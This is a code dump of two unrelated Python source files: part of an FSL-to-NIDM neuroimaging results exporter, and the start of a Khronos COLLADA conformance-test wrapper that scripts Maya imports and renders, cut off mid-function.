std_err_map = ContrastStdErrMap(
stat_num,
varcontrast_file, is_variance, self.coord_space,
self.coord_space, self.export_dir)
std_err_map_or_mean_sq_map = std_err_map
elif stat_type is "F":
contrast_map = None
sigma_sq_file = os.path.join(
stat_dir, 'sigmasquareds.nii.gz')
expl_mean_sq_map = ContrastExplainedMeanSquareMap(
stat_file, sigma_sq_file, stat_num,
self.coord_space, self.export_dir)
std_err_map_or_mean_sq_map = expl_mean_sq_map
else:
raise Exception("Unknown statistic type: "+stat_type)
con = Contrast(
con_num, contrast_name, weights, estimation,
contrast_map, std_err_map_or_mean_sq_map, stat_map,
z_stat_map)
contrasts.setdefault((mf_id, pe_ids), list()).append(con)
return contrasts
def _find_inferences(self):
"""
Parse FSL result directory to retreive information about inference
along with peaks and clusters. Return a dictionary of (key, value)
pairs where key is the identifier of a ContrastEstimation object and
value is an object of type Inference.
"""
inferences = dict()
for analysis_dir in self.analysis_dirs:
exc_sets = glob.glob(os.path.join(analysis_dir,
'thresh_z*.nii.gz'))
# Find excursion sets (in a given feat directory we have one
# excursion set per contrast)
for filename in exc_sets:
s = re.compile('zf?stat\d+')
zstatnum = s.search(filename)
zstatnum = zstatnum.group()
if zstatnum.startswith("zstat"):
stat_type = "T"
stat_num = zstatnum.replace('zstat', '')
elif zstatnum.startswith("zfstat"):
stat_type = "F"
stat_num = zstatnum.replace('zfstat', '')
# If more than one excursion set is reported, we need to use
# an index in the file names of the file exported in nidm
if len(exc_sets) > 1:
stat_num_t = "_" + \
stat_type.upper() + "{0:0>3}".format(stat_num)
else:
stat_num_t = ""
# Find corresponding contrast estimation activity
con_id = None
for contrasts in self.contrasts.values():
for contrast in contrasts:
s = re.compile('zf?stat\d+')
con_num = s.search(contrast.z_stat_map.file)
con_num = con_num.group()
con_num = con_num.replace('zstat', '')\
.replace('zfstat', '')\
.replace('.nii.gz', '')
if con_num == stat_num:
con_id = contrast.estimation.id
assert con_id is not None
# Inference activity
inference_act = InferenceActivity(
stat_num,
self.contrast_names_by_num[stat_num])
# Excursion set
visualisation = os.path.join(
analysis_dir,
'rendered_thresh_zstat' + stat_num + '.png')
zFileImg = os.path.join(analysis_dir,
'thresh_zstat' + stat_num + '.nii.gz')
exc_set = ExcursionSet(zFileImg, stat_num_t, visualisation,
self.coord_space, self.export_dir)
# Height Threshold
prob_re = r'.*set fmri\(prob_thresh\) (?P<info>\d+\.?\d+).*'
z_re = r'.*set fmri\(z_thresh\) (?P<info>\d+\.?\d+).*'
type_re = r'.*set fmri\(thresh\) (?P<info>\d+).*'
prob_thresh = float(self._search_in_fsf(prob_re))
z_thresh = float(self._search_in_fsf(z_re))
thresh_type = int(self._search_in_fsf(type_re))
# FIXME: deal with 0 = no thresh?
voxel_uncorr = (thresh_type == 1)
voxel_corr = (thresh_type == 2)
cluster_thresh = (thresh_type == 3)
stat_threshold = None
extent_p_corr = None
p_corr_threshold = None
p_uncorr_threshold = None
if voxel_uncorr:
p_uncorr_threshold = prob_thresh
elif voxel_corr:
p_corr_threshold = prob_thresh
else:
stat_threshold = z_thresh
extent_p_corr = prob_thresh
height_thresh = HeightThreshold(
stat_threshold,
p_corr_threshold, p_uncorr_threshold)
# Extent Threshold
extent_thresh = ExtentThreshold(p_corr=extent_p_corr)
# There is not table display listing peaks and clusters for
# voxelwise correction
if cluster_thresh:
# Clusters (and associated peaks)
clusters = self._get_clusters_peaks(stat_num)
# Peak and Cluster Definition Criteria
peak_criteria = PeakCriteria(
stat_num,
self._get_num_peaks(), self._get_peak_dist())
clus_criteria = ClusterCriteria(
stat_num,
self._get_connectivity())
else:
clusters = None
peak_criteria = None
clus_criteria = None
# FIXME: for now only based on conmask1_1
m = re.search(
r"set fmri\(conmask1_1\) (?P<con_maskg>\d+)",
self.design_txt)
assert m is not None
contrast_masking = bool(int(m.group("con_maskg")))
if contrast_masking:
# Display mask
# FIXME deal with the case in which we are contrast masking by
# more than one contrast
# contrast_masking_search = re.compile(r'.*set
# fmri\(conmask'+contrast_num+'_(?P<maskingconnum>\d+)\)
# (?P<domask>\d+).*')
# contrast_masking_found =
# contrast_masking_search.search(self.design_txt)
# do_contrast_masking =
# float(contrast_masking_found.group('domask'))
# if do_contrast_masking:
# contrast_masking_num =
# contrast_masking_found.group('maskingconnum')
# contrast_masking_file =
# else:
# contrast_masking_num = None
# FIXME: We need an example with more than one contrast to code
# contrast masking
contrast_masking_file = self._get_display_mask()
display_mask = DisplayMaskMap(
stat_num,
contrast_masking_file, self.coord_space,
self.export_dir)
else:
display_mask = None
# Search space
search_space = self._get_search_space(analysis_dir)
inference = Inference(
self.version,
inference_act, height_thresh,
extent_thresh, peak_criteria, clus_criteria,
display_mask, exc_set, clusters, search_space,
self.software.id)
inferences.setdefault(con_id, list()).append(inference)
return inferences
def _get_design_matrix(self, analysis_dir):
"""
Parse FSL result directory to retreive information about the design
matrix. Return an object of type DesignMatrix.
"""
design_mat_file = os.path.join(analysis_dir, 'design.mat')
design_mat_fid = open(design_mat_file, 'r')
design_mat_values = np.loadtxt(design_mat_fid, skiprows=5, ndmin=2)
design_mat_image = os.path.join(analysis_dir, 'design.png')
# Regressor names (not taking into account HRF model)
regnames_re = r'.*set fmri\(evtitle\d+\).*'
ev_names = re.findall(regnames_re, self.design_txt)
orig_ev = dict()
for ev_name in ev_names:
regname_re = r'.*set fmri\(evtitle(?P<num>\d+)\)\s*"(?P<name>.*)"'
info_search = re.compile(regname_re)
info_found = info_search.search(ev_name)
num = info_found.group('num')
name = info_found.group('name')
orig_ev[int(num)] = name
# For first-level fMRI only
if self.first_level:
# Design-type: event, mixed or block
# FIXME: deal with other options than "custom"
onsets_re = r'.*set fmri\(custom(?P<num>\d+)\)\s*"(?P<file>.*)".*'
r = re.compile(onsets_re)
onsets = [m.groupdict() for m in r.finditer(self.design_txt)]
max_duration = 0
min_duration = 36000
for onset in onsets:
if os.path.isfile(onset['file']):
aa = np.loadtxt(onset['file'])
max_duration = max(
max_duration, np.amax(aa[:, 2], axis=None))
min_duration = min(
min_duration, np.amin(aa[:, 2], axis=None))
else:
missing_onset_file = onset['file']
max_duration = None
if max_duration is not None:
if max_duration <= 1:
design_type = NIDM_EVENT_RELATED_DESIGN
elif min_duration > 1:
design_type = NIDM_BLOCK_BASED_DESIGN
else:
design_type = NIDM_MIXED_DESIGN
else:
warnings.warn(
"Onset file " + missing_onset_file + " not found, " +
"design type will not be reported")
design_type = None
# HRF model (only look at first ev)
m = re.search(
r"set fmri\(convolve1\) (?P<hrf>\d)", self.design_txt)
assert m is not None
hrf = int(m.group("hrf"))
if hrf == 1: # 1: Gaussian
hrf_model = NIDM_GAUSSIAN_HRF
elif hrf == 2: # 2 : Gamma
hrf_model = NIDM_GAMMA_HRF
elif hrf == 3: # 3 : Double-Gamma HRF
hrf_model = FSL_FSLS_GAMMA_DIFFERENCE_HRF
elif hrf == 4: # 4 : Gamma basis functions
hrf_model = NIDM_GAMMA_HRB
elif hrf == 5: # 5 : Sine basis functions
hrf_model = NIDM_SINE_BASIS_SET
elif hrf == 6: # 6 : FIR basis functions
hrf_model = NIDM_FINITE_IMPULSE_RESPONSE_HRB
# Drift model
m = re.search(
r"set fmri\(paradigm_hp\) (?P<cut_off>\d+)", self.design_txt)
assert m is not None
cut_off = float(m.group("cut_off"))
drift_model = DriftModel(
FSL_GAUSSIAN_RUNNING_LINE_DRIFT_MODEL, cut_off)
else:
design_type = None
hrf_model = None
drift_model = None
real_ev = list()
for ev_num, ev_name in orig_ev.items():
real_ev.append(ev_name)
# Add one regressor name if there is an extra column for a temporal
# derivative
tempo_deriv_re = \
r'.*set fmri\(deriv_yn'+str(ev_num)+'\) (?P<info>[\d]+).*'
tempo_deriv = bool(self._search_in_fsf(tempo_deriv_re))
if tempo_deriv:
real_ev.append(ev_name+'*temporal_derivative')
# FIXME: other hrf models (FIR...)
design_matrix = DesignMatrix(design_mat_values, design_mat_image,
self.export_dir, real_ev, design_type,
hrf_model, drift_model)
return design_matrix
def _get_data(self):
"""
Parse FSL result directory to retreive information about the data.
Return an object of type Data.
"""
grand_mean_scaling = True
target_intensity = 10000.0
data = Data(grand_mean_scaling, target_intensity)
return data
def _get_error_model(self):
"""
Parse FSL result directory to retreive information about the error
model. Return an object of type ErrorModel.
"""
if self.first_level:
variance_homo = True
dependance = SERIALLY_CORR
variance_spatial = SPATIALLY_LOCAL
dependance_spatial = SPATIALLY_REGUL
else:
variance_homo = False
dependance = INDEPEDENT_CORR
variance_spatial = SPATIALLY_LOCAL
dependance_spatial = None
error_distribution = NIDM_GAUSSIAN_DISTRIBUTION
error_model = ErrorModel(
error_distribution, variance_homo,
variance_spatial, dependance, dependance_spatial)
return error_model
def _get_residual_mean_squares_map(self, stat_dir):
"""
Parse FSL result directory to retreive information about the residual
mean squares map. Return an object of type ResidualMeanSquares.
"""
if self.first_level:
residuals_file = os.path.join(stat_dir, 'sigmasquareds.nii.gz')
else:
# FIXME cope num enter here
sigma2_group_file = os.path.join(stat_dir,
'mean_random_effects_var1.nii.gz')
sigma2_sub_file = os.path.join(stat_dir,
'varcope1.nii.gz')
# Create residual mean squares map
sigma2_group_img = nib.load(sigma2_group_file)
sigma2_group = sigma2_group_img.get_data()
sigma2_sub_img = nib.load(sigma2_sub_file)
sigma2_sub = sigma2_sub_img.get_data()
residuals_file = os.path.join(stat_dir,
'calculated_sigmasquareds.nii.gz')
residuals_img = nib.Nifti1Image(sigma2_group + sigma2_sub,
sigma2_sub_img.get_qform())
nib.save(residuals_img, residuals_file)
# In FSL all files will be in the same coordinate space
self.coord_space = CoordinateSpace(self._get_coordinate_system(),
residuals_file)
rms_map = ResidualMeanSquares(self.export_dir, residuals_file,
self.coord_space)
# FIXME: does not work
# if not self.first_level:
# Delete calculated rms file (a copy is now in the NIDM export)
# FIXME we need to add the wasDerivedFrom maps
# os.remove(residuals_file)
return rms_map
def _get_param_estimate_maps(self, stat_dir):
"""
Parse FSL result directory to retreive information about the parameter
estimates. Return a list of objects of type ParameterEstimateMap.
"""
param_estimates = list()
for filename in os.listdir(stat_dir):
if filename.startswith("pe"):
if filename.endswith(".nii.gz"):
s = re.compile('pe\d+')
penum = s.search(filename)
penum = penum.group()
penum = penum.replace('pe', '')
full_path_file = os.path.join(stat_dir, filename)
param_estimate = ParameterEstimateMap(
full_path_file,
penum, self.coord_space)
param_estimates.append(param_estimate)
return param_estimates
def _get_mask_map(self, analysis_dir):
"""
Parse FSL result directory to retreive information about the mask
created as part of Model Parameters Estimation. Return an object of
type MaskMap.
"""
mask_file = os.path.join(analysis_dir, 'mask.nii.gz')
mask_map = MaskMap(self.export_dir, mask_file,
self.coord_space, False)
return mask_map
def _get_grand_mean(self, mask_file, analysis_dir):
"""
Parse FSL result directory to retreive information about the grand
mean map. Return an object of type GrandMeanMap.
"""
grand_mean_file = os.path.join(analysis_dir, 'mean_func.nii.gz')
# FIXME: Check if there is an alternative file to use here (maybe)
# depending on FSL version
if not os.path.isfile(grand_mean_file):
grand_mean = None
else:
grand_mean = GrandMeanMap(grand_mean_file, mask_file,
self.coord_space, self.export_dir)
return grand_mean
def _get_coordinate_system(self):
"""
Parse FSL result directory to retreive information about the
coordinate system used in the current analysis (dependent on the
template).
"""
space_re = r'.*set fmri\(regstandard_yn\) (?P<info>[\d]+).*'
standard_space = bool(self._search_in_fsf(space_re))
if standard_space:
custom_re = \
r'.*set fmri\(alternateReference_yn\) (?P<info>[\d]+).*'
custom_space = self._search_in_fsf(custom_re, True)
if custom_space is not None:
custom_space = (custom_space == "1")
else:
custom_space = False
if custom_space is not None:
custom_standard = (custom_space == "1")
else:
custom_re = r'.*set fmri\(regstandard\) (?P<info>.+).*'
custom_space = self._search_in_fsf(custom_re)
if custom_space is not None:
custom_standard = True
else:
custom_standard = False
# TODO check if first level is always performed in subject space?
if not standard_space or self.first_level:
coordinate_system = NIDM_SUBJECT_COORDINATE_SYSTEM
else:
if not custom_standard:
coordinate_system = \
NIDM_ICBM_MNI152_NON_LINEAR6TH_GENERATION_COORDINATE_SYSTEM
else:
coordinate_system = NIDM_STANDARDIZED_COORDINATE_SYSTEM
return coordinate_system
def _search_in_fsf(self, regexp, return_not_found=False):
"""
Look for information matching regular expression 'regexp' in the design
file of the current study.
"""
info_search = re.compile(regexp)
info_found = info_search.search(self.design_txt)
if not info_found and return_not_found:
info = None
else:
info = info_found.group('info')
return info
def _get_display_mask(self):
"""
Parse FSL result directory to retreive information about display mask.
"""
# FIXME this should be updated with actual contrast masking file
mask_file = os.path.join(self.feat_dir, 'mask.nii.gz')
return mask_file
def _get_num_peaks(self):
if self.feat_post_log is not None:
num_peak_search = re.compile(r'.* --num=(?P<numpeak>\d+)+ .*')
num_peak_found = num_peak_search.search(self.feat_post_log)
if num_peak_found:
num_peak = int(num_peak_found.group('numpeak'))
else:
num_peak_search = re.compile(r'.* -n=(?P<numpeak>\d+)+ .*')
num_peak_found = num_peak_search.search(self.feat_post_log)
if num_peak_found:
num_peak = int(num_peak_found.group('numpeak'))
else:
# If not specified, default value is inf?
# (cf. http://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Cluster)
# Is it ok to say no limit with -1 (as for Inf
# we would need float...)
# FIXME: for now omitted if not explicitely defined
num_peak = None
else:
num_peak = None
return num_peak
def _get_peak_dist(self):
if self.feat_post_log is not None:
peak_dist_search = re.compile(
r'.* --peakdist=(?P<peakdist>\d+)+ .*')
peak_dist_found = peak_dist_search.search(self.feat_post_log)
if peak_dist_found:
peak_dist = float(peak_dist_found.group('peakdist'))
else:
# If not specified, default value is zero (cf.
# http://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Cluster)
peak_dist = 0.0
else:
peak_dist = 0.0
return peak_dist
def _get_connectivity(self):
"""
Parse FSL result directory to retreive peak connectivity within a
cluster.
"""
if self.feat_post_log is not None:
conn_re = r'.* --connectivity=(?P<connectivity>\d+)+ .*'
connectivity_search = re.compile(conn_re)
connectivity = int(
connectivity_search.search(
self.feat_post_log).group('connectivity'))
else:
connectivity = None
return connectivity
def _get_search_space(self, analysis_dir):
"""
Parse FSL result directory to retreive information about the search
space. Return an object of type SearchSpace.
"""
# FIXME this needs to be estimated
search_space_file = os.path.join(analysis_dir, 'mask.nii.gz')
smoothness_file = os.path.join(analysis_dir, 'stats', 'smoothness')
# Load DLH, VOLUME, RESELS and noise FWHM
with open(smoothness_file, "r") as fp:
smoothness_txt = fp.read()
sm_reg = \
r"FWHMx = (?P<FWHMx_vx>\d+\.?\d*) voxels, " + \
r"FWHMy = (?P<FWHMy_vx>\d+\.?\d*) voxels, " + \
r"FWHMz = (?P<FWHMz_vx>\d+\.?\d*) voxels\n" + \
r"FWHMx = (?P<FWHMx_mm>\d+\.?\d*) mm, " + \
r"FWHMy = (?P<FWHMy_mm>\d+\.?\d*) mm, " + \
r"FWHMz = (?P<FWHMz_mm>\d+\.?\d*) mm\n" + \
r"DLH (?P<DLH>\d+\.?\d*) voxels\^\-3\n" + \
r"VOLUME (?P<volume>\d+) voxels\n" + \
r"RESELS (?P<vox_per_resels>\d+\.?\d*) voxels per resel"
sm_match = re.search(sm_reg, smoothness_txt, re.DOTALL)
if sm_match:
d = sm_match.groupdict()
else:
# smoothness was estimated without the "-V" option, recompute
log_file = os.path.join(self.feat_dir, 'logs', 'feat3_stats')
if not os.path.isfile(log_file):
log_file = os.path.join(self.feat_dir, 'logs', 'feat3_film')
if not os.path.isfile(log_file):
warnings.warn(
"Log file feat3_stats/feat3_film not found, " +
"noise FWHM will not be reported")
noise_fwhm_in_voxels = None
noise_fwhm_in_units = None
# Load DLH, VOLUME and RESELS
d = dict()
d['DLH'], d['volume'], d['vox_per_resels'] = \
np.loadtxt(smoothness_file, usecols=[1])
else:
with open(log_file, "r") as fp:
log_txt = fp.read()
cmd_match = re.search(r"(?P<cmd>smoothest.*)\n", log_txt)
cmd = cmd_match.group("cmd")
cmd = cmd.replace("stats/smoothness", "stats/smoothness_v")
cmd = cmd.replace("smoothest", "smoothest -V")
subprocess.call("cd "+analysis_dir+";"+cmd, shell=True)
with open(smoothness_file+"_v", "r") as fp:
smoothness_txt = fp.read()
sm_match = re.search(sm_reg, smoothness_txt, re.DOTALL)
d = sm_match.groupdict()
vol_in_units = float(d['volume'])*np.prod(
json.loads(self.coord_space.voxel_size))
vol_in_resels = float(d['volume'])/float(d['vox_per_resels'])
if 'FWHMx_vx' in d:
noise_fwhm_in_voxels = json.dumps(
[float(d['FWHMx_vx']), float(d['FWHMy_vx']),
float(d['FWHMz_vx'])])
noise_fwhm_in_units = json.dumps(
[float(d['FWHMx_mm']), float(d['FWHMy_mm']),
float(d['FWHMz_mm'])])
search_space = SearchSpace(
search_space_file=search_space_file,
vol_in_voxels=int(d['volume']),
vol_in_units=vol_in_units,
vol_in_resels=vol_in_resels,
resel_size_in_voxels=float(d['vox_per_resels']),
dlh=float(d['DLH']),
random_field_stationarity=True,
noise_fwhm_in_voxels=noise_fwhm_in_voxels,
noise_fwhm_in_units=noise_fwhm_in_units,
coord_space=self.coord_space,
export_dir=self.export_dir)
return search_space
def _get_clusters_peaks(self, stat_num):
"""
Parse FSL result directory to retreive information about the clusters
and peaks declared significant for statistic 'stat_num'. Return a list
of Cluster objects.
"""
clusters = list()
for analysis_dir in self.analysis_dirs:
# Cluster list (positions in voxels)
cluster_file = os.path.join(analysis_dir,
'cluster_zstat' + stat_num + '.txt')
if not os.path.isfile(cluster_file):
cluster_file = None
else:
cluster_table = np.loadtxt(cluster_file, skiprows=1, ndmin=2)
# Cluster list (positions in mm)
cluster_std_file = os.path.join(
analysis_dir,
'cluster_zstat' + stat_num + '_std.txt')
if not os.path.isfile(cluster_std_file):
cluster_std_file = None
# cluster_std_table = np.zeros_like(cluster_table)*float('nan')
else:
cluster_std_table = np.loadtxt(cluster_std_file, skiprows=1,
ndmin=2)
# Peaks
peak_file = os.path.join(
analysis_dir, 'lmax_zstat' + stat_num + '.txt')
if not os.path.isfile(peak_file):
peak_file = None
else:
peak_table = np.loadtxt(peak_file, skiprows=1, ndmin=2)
peak_std_file = os.path.join(analysis_dir,
'lmax_zstat' + stat_num + '_std.txt')
if not os.path.isfile(peak_std_file):
peak_std_file = None
else:
peak_std_table = np.loadtxt(peak_std_file, skiprows=1, ndmin=2)
peaks = dict()
prev_cluster = -1
if (peak_file is not None) and (peak_std_file is not None):
peaks_join_table = np.column_stack(
(peak_table, peak_std_table))
for peak_row in peaks_join_table:
cluster_id = int(peak_row[0])
if not cluster_id == prev_cluster:
# First peak in this cluster
peakIndex = 1
# Though peak coordinates in voxels are integer, we use a
# float type to comply with the rdfs:range
peak = Peak(
peak_index=int(peakIndex), x=int(peak_row[2]),
y=int(peak_row[3]), z=int(peak_row[4]),
x_std=peak_row[7], y_std=peak_row[8],
z_std=peak_row[9],
equiv_z=float(peak_row[1]),
cluster_index=cluster_id, stat_num=stat_num)
if cluster_id in peaks:
peaks[cluster_id].append(peak)
else:
peaks[cluster_id] = list([peak])
prev_cluster = cluster_id
peakIndex = peakIndex + 1
elif (peak_file is not None):
for peak_row in peak_table:
cluster_id = int(peak_row[0])
if not cluster_id == prev_cluster:
peakIndex = 1
peak = Peak(
peak_index=int(peakIndex), x=int(peak_row[2]),
y=int(peak_row[3]), z=int(peak_row[4]),
equiv_z=float(peak_row[1]), cluster_index=cluster_id,
stat_num=stat_num)
if cluster_id in peaks:
peaks[cluster_id].append(peak)
else:
peaks[cluster_id] = list([peak])
prev_cluster = cluster_id
peakIndex = peakIndex + 1
elif (peak_std_file is not None):
for peak_row in peak_std_table:
cluster_id = int(peak_row[0])
if not cluster_id == prev_cluster:
peakIndex = 1
peak = Peak(
peak_index=int(peakIndex),
x_std=peak_row[2],
y_std=peak_row[3],
z_std=peak_row[4],
equiv_z=float(peak_row[1]), cluster_index=cluster_id,
stat_num=stat_num)
if cluster_id in peaks:
peaks[cluster_id].append(peak)
else:
peaks[cluster_id] = list([peak])
prev_cluster = cluster_id
peakIndex = peakIndex + 1
if (cluster_file is not None) and (cluster_std_file is not None):
clusters_join_table = np.column_stack((cluster_table,
cluster_std_table))
for cluster_row in clusters_join_table:
cluster_id = int(cluster_row[0])
size = int(cluster_row[1])
pFWER = float(cluster_row[2])
x = float(cluster_row[8])
y = float(cluster_row[9])
z = float(cluster_row[10])
x_std = float(cluster_row[24])
y_std = float(cluster_row[25])
z_std = float(cluster_row[26])
clusters.append(
Cluster(cluster_num=cluster_id, size=size,
pFWER=pFWER, peaks=peaks[
cluster_id], x=x, y=y, z=z,
x_std=x_std, y_std=y_std, z_std=z_std))
elif (cluster_file is not None):
for cluster_row in cluster_table:
cluster_id = int(cluster_row[0])
size = int(cluster_row[1])
pFWER = float(cluster_row[2])
x = float(cluster_row[8])
y = float(cluster_row[9])
z = float(cluster_row[10])
x_std = None
y_std = None
z_std = None
clusters.append(
Cluster(cluster_num=cluster_id, size=size,
pFWER=pFWER, peaks=peaks[
cluster_id], x=x, y=y, z=z,
x_std=x_std, y_std=y_std, z_std=z_std))
elif (cluster_std_file is not None):
for cluster_row in cluster_std_table:
cluster_id = int(cluster_row[0])
size = int(cluster_row[1])
pFWER = float(cluster_row[2])
x_std = float(cluster_row[8])
y_std = float(cluster_row[9])
z_std = float(cluster_row[10])
x = None
y = None
z = None
clusters.append(
Cluster(cluster_num=cluster_id, size=size,
pFWER=pFWER, peaks=peaks[
cluster_id], x=x, y=y, z=z,
x_std=x_std, y_std=y_std, z_std=z_std))
return clusters
|
|
# Copyright (c) 2012 The Khronos Group Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Materials.
# THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
import os.path
import shutil
import Core.Common.FUtils as FUtils
from stat import *
from Core.Logic.FSettingEntry import *
from Scripts.FApplication import *
class FMaya_UIRender (FApplication):
"""The class which represents Maya 7.0 to the testing framework.
Note that this has only been tested on Maya 7.0 and will probably not work
on other versions.
"""
__PLUGIN = ("COLLADA")
__MEL_SCRIPT_EXTENSION = ".mel"
__SCRIPT_EXTENSION = ".py"
__IMPORT_OPTIONS = [
("Import document up-axis", "importUpAxis", "0"),
("Import document units", "importUnits", "0")]
__EXPORT_OPTIONS = [
("Bake transforms", "bakeTransforms", "0"),
("Relative paths", "relativePaths", "0"),
("Bake lighting", "bakeLighting", "0"),
("Export camera as lookat", "exportCameraAsLookat", "0"),
("Export polygons as triangles", "exportTriangles", "0"),
("Sampling", "isSampling", "0"),
("Curve-Contrain", "curveConstrainSampling", "0"),
("Sampling Function", "samplingFunction", ""),
("Static curve removal", "removeStaticCurves", "1"),
("Export polygon meshes", "exportPolygonMeshes", "1"),
("Export lights", "exportLights", "1"),
("Export cameras", "exportCameras", "1"),
("Export joints and skin", "exportJointsAndSkin", "1"),
("Export animations", "exportAnimations", "1"),
("Export invisible nodes", "exportInvisibleNodes", "0"),
("Export default cameras", "exportDefaultCameras", "0"),
("Export normals", "exportNormals", "1"),
("Export texture coordinates", "exportTexCoords", "1"),
("Export per-vertex colors", "exportVertexColors", "1"),
("Export per-vertex color animations", "exportVertexColorAnimations", "1"),
("Export geometric tangents", "exportTangents", "0"),
("Export texture tangents", "exportTexTangents", "1"),
("Export materials only", "exportMaterialsOnly", "0"),
("Export constraints", "exportConstraints", "1"),
("Export physics", "exportPhysics", "1"),
("Exclusion set mode", "exclusionSetMode", "0"),
("Exclusion set", "exclusionSets", ""),
("Export external references", "exportXRefs", "1"),
("De-Reference external references", "dereferenceXRefs", "0"),
("XFov", "cameraXFov", "0"),
("YFov", "cameraYFov", "1")]
__RENDER_CAMERA = "Camera"
__RENDER_RENDERER = "Renderer"
__RENDER_ANIMATION_START = "Animation Start Frame"
__RENDER_ANIMATION_END = "Animation End Frame"
__RENDER_ANIMATION_STEP = "Animation Step Interval"
__RENDER_STILL_START = "Non-Animation Start Frame"
__RENDER_STILL_END = "Non-Animation End Frame"
__RENDER_STILL_STEP = "Non-Animation Step Interval"
__RENDER_WIDTH = "X resolution"
__RENDER_HEIGHT = "Y resolution"
__RENDER_ARD = "Device Aspect Ratio (empty to ignore)"
__RENDER_FORMAT = "Output Filetype"
__RENDER_OPTIONS = [
(__RENDER_CAMERA, "- NOT USED -", "|testCamera"),
(__RENDER_WIDTH, "- NOT USED -", "512"),
(__RENDER_HEIGHT, "- NOT USED -", "512"),
(__RENDER_ANIMATION_START, "setAttr defaultRenderGlobals.startFrame ", "1"),
(__RENDER_ANIMATION_END, "setAttr defaultRenderGlobals.endFrame ", "45"),
(__RENDER_ANIMATION_STEP, "setAttr defaultRenderGlobals.byFrameStep ", "3"),
(__RENDER_STILL_START, "setAttr defaultRenderGlobals.startFrame ", "1"),
(__RENDER_STILL_END, "setAttr defaultRenderGlobals.endFrame ", "1"),
(__RENDER_STILL_STEP, "setAttr defaultRenderGlobals.byFrameStep ", "1")]
def __init__(self, configDict):
"""__init__() -> FMaya_UIRender"""
FApplication.__init__(self, configDict)
self.__melScript = None
self.__currentFilename = None
self.__currentImportProperName = None
self.__testImportCount = 0
self.__workingDir = None
def GetPrettyName(self):
"""GetPrettyName() -> str
Implements FApplication.GetPrettyName()
"""
return "Maya - UIRender"
def GetSettingsForOperation(self, operation):
"""GetSettingsForOperation(operation) -> list_of_FSettingEntry
Implements FApplication.GetSettingsForOperation()
"""
options = []
# Retrieve the list of options for this operation.
optionList = None
if operation == IMPORT: optionList = FMaya_UIRender.__IMPORT_OPTIONS
elif operation == EXPORT: optionList = FMaya_UIRender.__EXPORT_OPTIONS
elif operation == RENDER: optionList = FMaya_UIRender.__RENDER_OPTIONS
# Return a correctly-processed list of FSettingEntry's.
if optionList != None:
for entry in optionList:
options.append(FSettingEntry(*entry))
return options
def BeginScript(self, workingDir):
"""BeginScript(workingDir) -> None
Implements FApplication.BeginScript()
"""
melFilename = ("script" + str(self.applicationIndex) + FMaya_UIRender.__MEL_SCRIPT_EXTENSION)
self.__melScript = open(os.path.join(workingDir, melFilename) , "w")
self.__melScript.write(
"int $descriptor;\n" +
"catch(`loadPlugin \"" +
FMaya_UIRender.__PLUGIN.replace("\\", "\\\\") + "\"`);\n" +
"catch(`file -f -new`);\n\n" +
"proc fixNewlines(string $filename) {\n" +
" $tempFilename = $filename + \".temp\";\n" +
"\n" +
" $file=`fopen $filename \"r\"`;\n" +
" $tempFile=`fopen $tempFilename \"w\"`;\n" +
"\n" +
" string $nextLine = `fgetline $file`;\n" +
" while (size($nextLine) > 0) { \n" +
" fprint $tempFile `substitute \"\\n\" " +
"$nextLine \"\\r\\n\"`;\n" +
" $nextLine = `fgetline $file`;\n" +
" }\n" +
" fclose $tempFile;\n" +
" fclose $file;\n" +
"\n" +
" sysFile -delete $filename;\n" +
" sysFile -rename $filename $tempFilename;\n" +
"}\n\n")
self.__testImportCount = 0
self.__workingDir = workingDir
self.__renderFolders = []
def EndScript(self):
"""EndScript() -> None
Implements FApplication.EndScript()
"""
self.__melScript.close()
def RunScript(self):
"""RunScript() -> None
Implements FApplication.RunScript()
"""
if (not os.path.isfile(self.configDict["mayaPath"])):
print "Maya does not exist"
return True
command = ("\"" + self.configDict["mayaPath"] +
"\" -batch -script \"" + self.__melScript.name + "\"")
# quotes around command is awkward, but seems like the only way works
print ("start running " + os.path.basename(self.__melScript.name))
returnValueImport = self.RunApplication(command, self.__workingDir)
if (returnValueImport == 0):
print "finished running " + os.path.basename(self.__melScript.name)
else:
print "crashed running " + os.path.basename(self.__melScript.name)
# Maya has a tendency to dump images where I don't want them to be.
# Look for images in the sub-folders of the output folder and move them to the output folder.
for renderFolder in self.__renderFolders:
subFolders = [renderFolder]
while (len(subFolders) > 0):
subFolder = subFolders[-1]
subFolders.pop()
for dirEntry in os.listdir(subFolder):
pathname = os.path.join(subFolder, dirEntry)
mode = os.stat(pathname)[ST_MODE]
if S_ISDIR(mode):
# Add this sub-folder to our queue.
subFolders.append(pathname)
elif S_ISREG(mode):
# Process all python script files, except for the __init__.py ones.
if FUtils.GetExtension(pathname).lower() == "png":
shutil.move(pathname, os.path.join(renderFolder, dirEntry))
self.__renderFolders = []
return (returnValueImport == 0)
def WriteImport(self, filename, logname, outputDir, settings, isAnimated, cameraRig, lightingRig):
"""WriteImport(filename, logname, outputDir, settings, isAnimated, cameraRig, lightingRig) -> list_of_str
Implements FApplication.WriteImport(). Assumes a COLLADA, maya binary,
or maya ascii file is being imported.
"""
baseName = FUtils.GetProperFilename(filename)
self.__currentImportProperName = baseName
output = (os.path.join(outputDir, baseName)).replace("\\", "/")
filename = filename.replace("\\", "/")
self.__currentFilename = output + ".mb"
# Generate the import options string.
options = ""
for setting in settings:
value = setting.GetValue().strip()
if len(value) == 0:
value = self.FindDefault(FMaya_UIRender.__IMPORT_OPTIONS, setting.GetPrettyName())
options = (options + setting.GetCommand() + "=" + value + ";")
# Generate the import MEL command.
extension = FUtils.GetExtension(filename).lower()
if (extension == "mb"):
